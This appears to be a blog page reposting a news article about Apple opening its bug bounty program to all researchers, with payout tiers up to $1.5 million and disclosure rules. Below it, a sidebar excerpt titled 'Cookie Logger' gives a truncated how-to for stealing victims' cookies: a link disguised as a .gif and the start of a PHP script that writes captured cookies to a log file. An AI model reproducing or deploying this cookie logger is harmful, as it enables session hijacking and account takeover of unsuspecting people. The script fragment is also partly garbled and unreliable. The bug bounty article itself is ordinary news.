Skip to main content

Apple Opens Its Invite-Only Bug Bounty Program to All Researchers

By
Apple Bug Bounty


As promised by Apple in August this year, the company today finally opened its bug bounty program to all security researchers, offering monetary rewards to anyone for reporting vulnerabilities in the iOS, macOS, watchOS, tvOS, iPadOS, and iCloud to the company.

Since its launch three years ago, Apple's bug bounty program was open only for selected security researchers based on invitation and was only rewarded for reporting vulnerabilities in the iOS mobile operating system.

 However, speaking at a hacking conference in August this year, Ivan Krstić, head of Apple Security Engineering and Architecture at Apple, announced the company's upcoming extended bug bounty program which included three main highlights:

  • an enormous increase in the maximum reward from $200,000 to $1.5 million,
  • accepting bug reports for all of its operating systems and latest hardware,
  • opening the program for all researchers.

Now starting from today, all security researchers and hackers are eligible to receive a cash payout for finding and responsibly disclosing a valid security vulnerability in the "latest publicly available versions of iOS, iPadOS, macOS, tvOS, or watchOS with a standard configuration," as was first announced by Krstić on Twitter.

Apple bug bounty program

Even after submitting a valid security bug, researchers need to follow some basic eligibility rules for receiving rewards, which includes reporting details directly to the Apple security team without revealing anything to the public until the company releases a patch and providing a clear report with a working exploit.

As shown in the bug bounty payout chart above, $1 million will be awarded only to those who submit a severe deadly zero-clickable kernel code execution exploit that could enable complete, persistent control of a targeted device.

 What's more? On top of its maximum reward of $1 million, Apple will also offer a 50% bonus to those who find and report vulnerabilities in its pre-release software (beta version) before its public release—bringing its maximum reward to $1.5 million.

Besides this, Apple will now also pay an additional 50% bonus on the eligible reward amount for reporting a 'regression' vulnerability that the company patched in previous versions of its software, but reintroduced 'mistakenly' in a developer beta or public beta release.

Apple Security Bounty program aims to also encourage hackers who either publicly disclose security vulnerabilities they discovered in Apple products or sell it to private vendors like ZerodiumCellebrite, and Grayshift, who deal in zero-day exploits.

 Source :The Hacker News
Labels:

Comments

Post a Comment

Popular posts from this blog

10 Best Forum Software For Webmasters

By
10 Best Forum Software For Webmasters Do you want to create your online discussion forum or online community where people can discuss about their favorite topics? In this article, you can see 10 best forum software (scripts for setting up discussion forums) that can be used free of cost. Although some scripts are paid but rest of these forum scripts are free to use.You only need to buy hosting space and domain name for your website and after then you can install any of these forum scripts to start your own discussion forums on the internet. Online discussion forums generate huge page views because thousands of people want to join online discussion forums to ask questions or share knowledge. Some of online marketers join forums to discuss about their products with community members. You don't need to acquire any kind of technical skill to run a professional discussion forums because these days, almost all web hosting providers offer one click script installer which h...
Post a Comment
Read more

Cookie Logger

By
         Cookie Logger ---------------------------------------------- A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger… Hope you will enjoy Reading it... STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary...
Post a Comment
Read more

iOS/macOS Webcam Can be Hacked With A Single Click On Malformed Link – Hacker Rewarded $75,000

By
By just making the users visiting a link, an attacker can hack the users’ iOS/macOS Camera using zero-day bugs in Safari. With iOS and macOS camera security model every app needs to assigned permission manually but Apple’s own app such as  Safari  gets access by default. Security researcher Ryan Pickren  discovered  seven new vulnerabilities with Safari browser that allows attackers to access your device’s camera, microphone, or location, and in some cases, saved passwords as well. Pickren said that Safari not using the method of the origin to keep track of the open website, “I deduced that Safari was likely running a Generic URI Syntax parser against all open windows to get the URIs’ hostnames, then doing some extra parsing on those.” Exploiting Bugs to Access Camera He started exploiting using javascript: data: and about, but that fails, but while parsing file: which specified for remote or FTP purpose( file://host.example.com/Share/path/to/file.txt ...
Post a Comment
Read more